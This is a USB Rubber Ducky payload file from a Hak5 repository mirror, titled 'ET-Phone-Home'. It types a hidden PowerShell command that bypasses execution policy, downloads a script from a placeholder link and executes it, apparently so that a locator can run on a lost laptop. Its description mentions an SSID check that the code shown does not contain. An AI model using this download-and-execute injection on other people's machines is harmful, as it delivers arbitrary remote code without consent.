Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/incident_response/-RD-ET-Phone-Home/payload.txt
2968 views
1
REM Title: ET-Phone-Home
2
3
REM Author: I am Jakoby
4
5
REM Target: Windows 10, 11
6
7
REM Description: this script will download and execute your locator script if your wifi access point is not detected
8
REM this script needs to be saved in the boot directory to have it run as soon as your device is plugged in
9
10
REM Remeber to replace the link with your link for the intended file to download if you are using a custom variant of this payload
11
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
12
13
REM Replace SSID with name of wifi your computer is connected to
14
15
16
GUI r
17
DELAY 500
18
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
19
ENTER
20
21
22
23